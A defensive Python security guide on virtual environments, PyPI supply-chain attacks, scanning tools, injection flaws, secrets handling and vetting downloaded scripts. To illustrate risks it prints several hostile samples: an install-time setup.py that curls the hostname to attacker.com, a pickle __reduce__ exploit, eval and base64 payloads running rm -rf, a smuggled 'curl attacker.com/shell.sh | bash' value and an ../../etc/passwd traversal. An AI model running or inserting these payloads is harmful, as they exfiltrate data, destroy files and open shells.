Python is everywhere — scripting, automation, security tooling, data pipelines, web backends. That ubiquity comes with an attack surface that is easy to underestimate. Python’s design philosophy (batteries included, dynamic, flexible) creates categories of risk that simply do not exist in stricter languages.

This guide covers two scenarios: the risks you face when writing Python code, and the risks you face when downloading and running scripts or packages someone else wrote. Both matter, and the failure modes are different.

TL;DR

  • Always use virtual environments — but understand that venv is not a sandbox: malicious code inside a venv can still read files, make network calls, and access your secrets
  • PyPI has no pre-publication malware scanning — typosquatting, dependency confusion, and maintainer takeovers are active attack vectors
  • Use guarddog before installing unknown packages, pip-audit for CVE scanning, and bandit for your own code
  • eval(), exec(), pickle, and subprocess with user input are injection vulnerabilities, not just bad practice
  • Secrets in source code get committed, pushed, and leaked — use environment variables or a secrets manager
  • Before running any downloaded script: read it, check its imports, and verify the package name character by character

Part 1: The Environment — Isolation Before Anything Else

Virtual Environments Are a Security Boundary, Not Just Convenience

Most Python developers know venvs prevent dependency conflicts. Fewer think of them as a security control — but they are.

What happens without a venv:

# No venv — pip installs globally, as your user or as root
pip install requests
# Now requests (and anything it pulls in) has access to your system Python
# and potentially to site-packages shared across all your projects

The problems this creates:

  1. Cross-project contamination — a malicious package installed for Project A is available to Project B. Venvs break this: each environment is isolated.

  2. Privilege escalation via system Python — if you habitually run sudo pip install, you’re installing third-party code with root privileges. Any malicious package that runs code at install time (via setup.py or PEP 517 hooks) executes as root.

  3. No clean uninstall path — without venvs, you cannot reliably remove a package and all its side effects. A compromised environment can be nuked and recreated; a contaminated system Python is harder to clean.

Always use a venv:

# Create and activate
python -m venv .venv
source .venv/bin/activate # Linux/macOS
.venv\Scripts\activate # Windows
# Install inside the venv only
pip install requests
# Deactivate when done
deactivate

Modern projects should use pyproject.toml with a tool like uv or poetry that enforces isolation automatically. The point is the same: code you did not write runs in a contained environment where damage is limited.

Venv Is Not a Sandbox

This is the most common misconception about virtual environments: a venv does not restrict what code can do at the OS level.

A malicious package installed inside a venv can still:

  • Read any file your user account can read — including ~/.ssh/, ~/.aws/credentials, browser cookie databases
  • Make outbound network connections to exfiltrate data
  • Spawn subprocesses (subprocess, os.system)
  • Read environment variables — including AWS_SECRET_ACCESS_KEY, DATABASE_URL, any secret you have set in your shell
  • Write or delete files anywhere your user has write access
  • Access other venvs on the same machine

The venv boundary is a Python module namespace boundary, not an OS-level isolation boundary. It prevents package conflicts between projects. It does not prevent malicious code from running.
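The claim is easy to verify. This harmless sketch counts what any import-time code in a venv-installed package could already reach; nothing here is blocked by the venv:

```python
# A sketch of the access a venv-installed package already has the
# moment it runs -- the venv changes sys.path, nothing else.
# Safe to run: it only counts what it could read.
import os
import sys
from pathlib import Path

# 1. Environment variables: every secret exported in your shell
secret_like = [k for k in os.environ if any(s in k for s in ("KEY", "TOKEN", "SECRET"))]

# 2. Files: anything your user account can read, venv or no venv
ssh_dir = Path.home() / ".ssh"
readable_ssh = [p.name for p in ssh_dir.iterdir()] if ssh_dir.is_dir() else []

# 3. Nothing stops subprocess or socket use either
print(f"running under prefix: {sys.prefix}")
print(f"secret-looking env vars visible: {len(secret_like)}")
print(f"files visible under ~/.ssh: {len(readable_ssh)}")
```

Running this inside an activated venv and outside one gives the same counts, which is exactly the point.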

For actual isolation when running untrusted code, use Docker with restricted permissions:

# No network, no access to home directory, read-only filesystem except /tmp
docker run --rm \
--network none \
--read-only \
--tmpfs /tmp \
-v $(pwd)/suspicious_script.py:/script.py:ro \
python:3.12-slim python /script.py

This is the difference: venv protects your project dependencies from each other. Docker (or a VM) protects your system from untrusted code.

The --user Flag Is Not a Safe Alternative

pip install --user installs to ~/.local/lib/python3.x/site-packages. This avoids root, but:

  • It shares across all projects for that user
  • It is included in sys.path by default, meaning a malicious package installed --user can still affect all your Python processes
  • It still runs setup.py and build hooks with your full user privileges

Use venvs. --user is a compromise, not a solution.


Part 2: Package Security — What PyPI Won’t Catch for You

PyPI Has No Pre-Publication Malware Scanning

Anyone with a PyPI account can publish a package. There is no review process, no sandbox execution of install hooks before publication. PyPI does conduct post-hoc malware scanning and removes packages when discovered — but the window between publication and removal can be hours or days.

During that window, automated systems (CI/CD pipelines, Docker builds, developer laptops) may already have installed the package.

Typosquatting — One Character Away

Attackers register package names that are visually similar to popular packages:

Legitimate    Typosquatted
requests      request / requestss / requuests
numpy         nunpy / nummpy / numpy-base
Pillow        Pil / pillow-python
boto3         bot03 (zero, not O) / boto
pycrypto      py-crypto / pycrypt0

The malicious package usually works as expected — it installs the real library as a dependency and adds its own malicious code on top. The victim sees no errors.
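Catching a near-miss name is mechanical enough to script. A hypothetical pre-install helper (not a pip feature; `typosquat_warning` and the `POPULAR` list are illustrative names) using stdlib difflib:

```python
# Hypothetical pre-install check: flag a name that is suspiciously
# close to, but not exactly, a popular package.
import difflib

POPULAR = ["requests", "numpy", "pandas", "pillow", "boto3", "pycrypto"]

def typosquat_warning(name: str):
    """Return the popular package `name` resembles, or None if exact/unrelated."""
    if name.lower() in POPULAR:
        return None  # exact match: the real package
    close = difflib.get_close_matches(name.lower(), POPULAR, n=1, cutoff=0.8)
    return close[0] if close else None

print(typosquat_warning("requestss"))  # requests
print(typosquat_warning("requests"))   # None
```

A check like this belongs in a wrapper around pip install, not as a replacement for verifying the name on pypi.org.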

How to protect yourself:

# Always verify the exact package name on pypi.org before installing
# Check: publication date, download count, maintainer history
# Use pip-audit to scan installed packages for known vulnerabilities
pip install pip-audit
pip-audit
# Use our own gate-cli for supply chain risk scoring
pip install gate-cli
gate scan requests numpy pandas

Dependency Confusion

If your internal package registry serves packages by name, and a package with that name also exists on PyPI, pip may fetch the PyPI version instead of your internal one — especially if the PyPI version has a higher version number.

Attackers register public PyPI packages with names that match internal corporate package names. When a developer or CI pipeline runs pip install, they get the attacker’s package.
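A toy model shows why this works. The package name, versions, and index URLs below are made up; the point is only that for an unpinned requirement, pip selects the highest version across all configured indexes:

```python
# Toy model of dependency confusion: pip gathers candidates from every
# configured index and installs the highest version, wherever it came
# from. All names and URLs here are illustrative.
internal = [("internal-utils", (1, 4, 0), "https://your-internal-registry/simple/")]
public = [("internal-utils", (99, 0, 0), "https://pypi.org/simple/")]  # attacker's upload

candidates = internal + public
name, version, index = max(candidates, key=lambda c: c[1])

print(f"pip would install {name} {version} from {index}")
# → pip would install internal-utils (99, 0, 0) from https://pypi.org/simple/
```

Attackers publish with an absurdly high version number for exactly this reason.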

Mitigation:

# pip.conf — route all installs through one internal index that proxies PyPI.
# Note: adding pypi.org via extra-index-url does NOT scope packages —
# pip treats every index equally and will take the highest version from any of them.
[global]
index-url = https://your-internal-registry/simple/

# For packages that must only come from internal sources:
pip install --no-index --find-links=./vendor/ internal-package

setup.py and Build Hook Execution at Install Time

When you run pip install somepackage, pip may execute setup.py or PEP 517 build hooks — before you have reviewed any code. This is arbitrary code execution by design.

# A malicious setup.py — runs at pip install time
from setuptools import setup
import subprocess

# This executes during `pip install` — shell=True so $(hostname) expands
subprocess.run(
    "curl -s 'https://attacker.com/exfil?host='$(hostname)",
    shell=True, capture_output=True,
)

setup(name="totally-legitimate-package", ...)

For untrusted packages: use pip download <package> --no-deps to fetch the artifact without installing it, inspect the contents, then install from the reviewed file. Forcing wheels with pip install --only-binary :all: also helps, since installing a wheel runs no setup.py or build hooks. (Note that --no-build-isolation only changes how build dependencies are resolved; it does not prevent install-time code execution.)

Pinning Dependencies — Version Locking Is a Security Control

Floating dependencies (requests>=2.0) will install whatever is current at the time. If a package is later compromised (maintainer account takeover, malicious release), your next pip install or Docker build fetches the compromised version.

# requirements.txt
# Bad — installs whatever is latest
requests>=2.28.0
# Better — pins exact version
requests==2.31.0
# Best — pins version AND hash; generate with:
#   pip-compile --generate-hashes requirements.in

Hash pinning means pip refuses to install a package whose content does not match the recorded hash — even if the version number is the same. It makes supply chain substitution attacks significantly harder.
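What hash checking buys you can be shown in miniature. This sketch (the `verify` helper and the sample bytes are illustrative) mirrors what pip enforces under --require-hashes:

```python
# Miniature version of hash-checking mode: the artifact's content hash
# must match the recorded one, even when the filename and version
# look right. Sample bytes are illustrative.
import hashlib

recorded = hashlib.sha256(b"requests-2.31.0 wheel contents").hexdigest()

def verify(artifact: bytes, expected_sha256: str) -> bool:
    # Compare content, not metadata
    return hashlib.sha256(artifact).hexdigest() == expected_sha256

print(verify(b"requests-2.31.0 wheel contents", recorded))   # True
print(verify(b"tampered wheel contents", recorded))          # False
```

A substituted artifact fails the comparison no matter what version string it advertises.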


Part 3: Scanning Tools — What to Use and When

No single tool catches everything. The tooling landscape splits into three distinct categories that solve different problems — use all three.

Category 1: Vulnerability Scanners (Known CVEs)

These check whether your installed packages have known, published vulnerabilities. They are fast, reliable, and catch the easy stuff — but they are useless against a new malicious package that has no CVE yet.

pip-audit — the current standard, maintained by PyPA (the Python Packaging Authority):

pip install pip-audit
# Scan current environment
pip-audit
# Scan a requirements file without installing
pip-audit -r requirements.txt
# Output as JSON for CI
pip-audit --format json -o audit-results.json

Safety — uses the Safety DB maintained by pyup.io, good second opinion:

pip install safety
safety check
safety check -r requirements.txt

Snyk — commercial with a free tier, strongest CI/CD integration, pulls from multiple vulnerability databases including its own:

npm install -g snyk # yes, installed via npm
snyk auth
snyk test --file=requirements.txt

Snyk’s advantage: it tracks transitive dependencies (dependencies of dependencies) and can suggest upgrade paths that fix multiple issues at once. It also monitors your project continuously and alerts when new CVEs are published against your locked versions.

Trivy — broad scanner (containers, filesystems, repos), useful when Python is one part of a larger stack:

# Scan a directory containing requirements.txt or Pipfile.lock
trivy fs .
# Scan a Docker image that contains Python packages
trivy image my-python-app:latest

Category 2: Malicious Package Detectors (Behavioral Analysis)

These look for suspicious patterns in package code — network calls in setup.py, obfuscated strings, credential-harvesting patterns, unusual file system access. This is what catches typosquats and supply chain attacks that have no CVE.

guarddog (Datadog) — the strongest open source tool in this category:

pip install guarddog
# Scan a single package before installing — downloads and inspects without executing
guarddog pypi scan requests
guarddog pypi scan numpy --version 1.24.0
# Verify every dependency in a requirements file
guarddog pypi verify requirements.txt

guarddog checks for: setup.py network calls, cmd execution at install time, obfuscated code (base64 + exec patterns), credential file access, reverse shell patterns, and more. It inspects the package source without running it.

gate-cli — our own supply chain scanner, covers quarantine window risk (newly published packages with few downloads are statistically more likely to be malicious):

pip install gate-cli
gate scan requests numpy pandas
gate scan -r requirements.txt

gate focuses on signals that CVE scanners miss: publication recency, maintainer reputation, download velocity anomalies, and install-hook presence.

What these tools cannot do: detect a package that installs cleanly and only activates malicious behavior at runtime under specific conditions (e.g., when AWS_PROFILE is set, or when run on a CI server). That class of attack requires behavioral monitoring at runtime.

Category 3: Static Analysis for Your Own Code

These scan code you wrote for security vulnerabilities — injection risks, hardcoded secrets, insecure function use. They do not scan third-party packages.

Bandit — Python-specific, catches the issues covered in Part 4 of this article:

pip install bandit
# Scan a file or directory
bandit -r myproject/
# High severity, high confidence only
bandit -r myproject/ -lll -iii
# Output as JSON for CI
bandit -r myproject/ -f json -o bandit-report.json

Bandit flags: eval() and exec() calls, subprocess with shell=True, pickle usage, hardcoded passwords, weak cryptography, SQL injection patterns, and more. False positive rate is low enough for CI enforcement.

Semgrep — more powerful, supports custom rules, good for team-wide enforcement:

pip install semgrep
# Run with the Python security ruleset
semgrep --config=p/python-security .
# Run the OWASP Top 10 ruleset
semgrep --config=p/owasp-top-ten .

Semgrep’s advantage: you can write custom rules for your codebase. If your project has a pattern that should never appear (e.g., direct SQL string concatenation), write a rule for it once and it becomes part of every developer’s pre-commit check.

Stage                  Tool                 What it catches
Before pip install     guarddog pypi scan   Malicious packages, behavioral patterns
After install / in CI  pip-audit            Known CVEs in dependencies
In CI (deeper)         snyk test            CVEs + transitive deps + upgrade paths
Pre-commit / CI        bandit               Security issues in your own code
Pre-commit / CI        semgrep              Custom rules + OWASP patterns
Container builds       trivy image          Full stack: OS packages + Python

For production projects, run at minimum pip-audit + bandit in CI. Add guarddog for any project that installs packages dynamically or from less-known sources. Snyk is worth the free-tier signup for projects with complex dependency trees.


Part 4: Code You Write — The Python Injection Landscape

eval() and exec() — Injection by Design

eval() executes any Python expression. exec() executes any Python statement. If either receives user-controlled input, you have arbitrary code execution.

# Vulnerable — user can pass: "__import__('os').system('rm -rf ~')"
user_input = input("Enter a formula: ")
result = eval(user_input)
# Vulnerable exec — user can define and run anything
exec(user_input)

There is no safe way to sandbox eval() or exec() with user input in standard CPython. The __builtins__ restriction approach has been bypassed repeatedly.

The fix: don’t use them on user input. Use ast.literal_eval() if you need to parse Python literals (strings, numbers, lists, dicts) — it raises ValueError on anything that is not a literal value.

import ast
# Safe — only evaluates literals, raises ValueError on code
data = ast.literal_eval(user_input)
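If you need to evaluate user-supplied arithmetic rather than just literals, the safe route is to parse with ast and allow only an explicit whitelist of node types. A minimal sketch, not a hardened library; `safe_arith` is an illustrative name:

```python
# Whitelist-based arithmetic evaluator: walks the parsed AST and
# refuses anything that is not a number or a basic arithmetic op.
import ast
import operator

_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub,
    ast.Mult: operator.mul, ast.Div: operator.truediv,
    ast.USub: operator.neg,
}

def safe_arith(expr: str):
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.operand))
        raise ValueError("disallowed syntax")
    return walk(ast.parse(expr, mode="eval"))

print(safe_arith("2 + 3 * 4"))    # 14
# safe_arith("__import__('os')")  # raises ValueError: Call is not whitelisted
```

Anything outside the whitelist, including attribute access, calls, and subscripts, raises ValueError before any evaluation happens.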

pickle — Deserialization Is Code Execution

Python’s pickle module serializes and deserializes Python objects. Deserializing a pickle payload executes Python code — the object’s __reduce__ method runs during loading.

import pickle, os

class Exploit:
    def __reduce__(self):
        # pickle calls __reduce__ on load: the (callable, args) pair is invoked
        return (os.system, ("whoami",))

# This executes os.system("whoami") on the machine that loads it
payload = pickle.dumps(Exploit())

# On the victim's machine:
pickle.loads(payload)  # ← arbitrary code execution

Never unpickle data from untrusted sources. This includes: files uploaded by users, data from external APIs, inter-service messages if the sender is not fully trusted.

Safe alternatives:

  • json — for data exchange (no code execution risk)
  • msgpack — for binary serialization
  • protobuf — for typed inter-service communication

# Instead of pickle for data exchange:
import json
data = json.dumps(my_object)
restored = json.loads(data)

subprocess — Shell Injection

subprocess.run() with shell=True passes the command to /bin/sh — if any part of the command includes user input, you have shell injection.

# Vulnerable — user input is "filename; curl attacker.com/shell.sh | bash"
filename = request.args.get("file")
subprocess.run(f"cat {filename}", shell=True)

# Safe — pass as list, no shell interpolation
subprocess.run(["cat", filename], shell=False)

Rule: never use shell=True with any variable content. Pass arguments as a list. subprocess with a list does not invoke a shell — each element is passed as a literal argument to the executable.
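The difference is directly observable. With list arguments, shell metacharacters in user input arrive at the program as literal text:

```python
# With a list there is no shell, so ";" has no special meaning:
# the whole hostile string is delivered as one literal argument.
import subprocess

hostile = "hello; touch /tmp/pwned"  # would run a second command under shell=True
result = subprocess.run(["echo", hostile], capture_output=True, text=True)

print(result.stdout.strip())  # the literal string; no second command ran
```

Under shell=True the same input would have executed the touch command.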

Path Traversal

File operations with user-supplied paths can reach outside the intended directory:

# Vulnerable — user passes "../../etc/passwd"
filename = request.args.get("file")
with open(f"/var/data/uploads/{filename}") as f:
    return f.read()

Fix: resolve the final path and verify it is still inside the intended root:

from pathlib import Path

BASE_DIR = Path("/var/data/uploads").resolve()
requested = (BASE_DIR / filename).resolve()

# Path.is_relative_to requires Python 3.9+
if not requested.is_relative_to(BASE_DIR):
    raise PermissionError("Path traversal attempt")

with open(requested) as f:
    return f.read()

Part 5: Secrets — The Leak That Keeps on Leaking

Hardcoded Credentials Are a Permanent Vulnerability

Secrets committed to source code get into git history. Even if you remove them in the next commit, they exist in every clone made before that commit — and in the history that git log reveals.

# This is in your git history forever
API_KEY = "sk-live-xxxxxxxxxxxxxxxxxxx"
DB_PASSWORD = "SuperSecret123!"

The fix: environment variables or a secrets manager, never source code.

import os
# Load from environment
API_KEY = os.environ["API_KEY"]
DB_PASSWORD = os.environ["DB_PASSWORD"]
# Or use python-dotenv for development (never commit the .env file)
from dotenv import load_dotenv
load_dotenv()
API_KEY = os.getenv("API_KEY")
# .gitignore — add before first commit
.env
*.env
.env.local
secrets.json

If you have already committed a secret: rotate it immediately. Removing it from the current commit does not help — the secret is in history and in every existing clone.

Pre-commit scanning:

# Install detect-secrets to catch secrets before they hit the repo
pip install detect-secrets
detect-secrets scan > .secrets.baseline
detect-secrets audit .secrets.baseline

Part 6: Before You Run a Downloaded Script

Downloaded scripts (from GitHub, gists, blog posts, Reddit) deserve a read-through before execution. The checklist:

1. Check the imports

# Red flags in a script claiming to be a "system cleaner"
import subprocess
import socket
import base64
import os

Any script that imports socket, subprocess, and base64 together without a clear reason is suspicious. Network + shell execution + encoding is a common malware pattern.
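This triage step can be automated: ast.parse reads source without executing it, so you can enumerate a script's imports safely. The `list_imports` helper is an illustrative sketch:

```python
# List a script's imports without running it -- ast.parse only reads
# the source; no code executes.
import ast

def list_imports(source: str):
    tree = ast.parse(source)
    found = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            found.update(alias.name for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            found.add(node.module)
    return found

suspicious = list_imports("import socket\nimport base64\nfrom subprocess import run\n")
print(sorted(suspicious))  # ['base64', 'socket', 'subprocess']
```

Point it at a downloaded file with `list_imports(Path("script.py").read_text())` before you ever run the script itself.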

2. Look for obfuscation

# Red flags — obfuscated payload
exec(base64.b64decode("aW1wb3J0IG9zOyBvcy5zeXN0ZW0oInJtIC1yZiAvIik="))
# Decode it before running anything
import base64
print(base64.b64decode("aW1wb3J0IG9zOyBvcy5zeXN0ZW0oInJtIC1yZiAvIik="))
# → b'import os; os.system("rm -rf /")'

3. Run in a disposable environment

For any script you are not fully confident about, run it in a Docker container or VM with no access to your credentials, home directory, or network:

# Disposable container — script cannot reach your files or credentials
docker run --rm --network none -v $(pwd)/script.py:/script.py python:3.12-slim python /script.py

4. Verify package names character by character

Before pip install anything-from-a-blog-post: go to pypi.org/project/anything-from-a-blog-post and verify:

  • The package exists
  • The publication date is not from yesterday with 3 downloads
  • The maintainer has a history
  • The description matches what was advertised
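Several of these checks can be scripted against PyPI's JSON API (https://pypi.org/pypi/<name>/json). A sketch only: the `fetch_metadata`/`summarize` helpers and the fields they pull are assumptions about what to inspect, not an official client:

```python
# Sketch of scripting the pre-install checklist against PyPI's JSON API.
import json
import urllib.request

def fetch_metadata(name: str) -> dict:
    # Real endpoint: https://pypi.org/pypi/<name>/json
    url = f"https://pypi.org/pypi/{name}/json"
    with urllib.request.urlopen(url, timeout=10) as resp:
        return json.load(resp)

def summarize(meta: dict) -> dict:
    info = meta["info"]
    return {
        "name": info.get("name"),
        "maintainer": info.get("author") or info.get("maintainer") or "unknown",
        "release_count": len(meta.get("releases", {})),
        "summary": info.get("summary") or "",
    }

# Online: summarize(fetch_metadata("requests"))
# Offline sample showing the shape of the data:
sample = {
    "info": {"name": "requests", "author": "Kenneth Reitz",
             "summary": "Python HTTP for Humans."},
    "releases": {"2.30.0": [], "2.31.0": []},
}
print(summarize(sample))
```

A package with one release, an empty summary, and an unknown maintainer is exactly the profile the checklist above tells you to distrust.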

Quick Reference Checklist

Area                 What to do
Environments         Always use venv; never sudo pip install
Venv ≠ sandbox       Venv isolates modules, not OS access — use Docker for real isolation
Dependencies         Pin versions; use hash verification for production
Package names        Verify on pypi.org before installing; check character by character
Install hooks        Know that setup.py runs at install time — use guarddog first
Scanning: malicious  guarddog pypi scan <package> before installing unknowns
Scanning: CVEs       pip-audit in CI; Snyk for transitive dependency tracking
Scanning: your code  bandit + semgrep in CI or pre-commit
eval / exec          Never on user input; use ast.literal_eval for literals
pickle               Never deserialize untrusted data
subprocess           Never shell=True with variable content; pass as list
Path operations      Resolve and validate paths stay within intended root
Secrets              Environment variables only; .gitignore your .env; rotate anything committed
Downloaded scripts   Read before running; check imports; run in Docker with --network none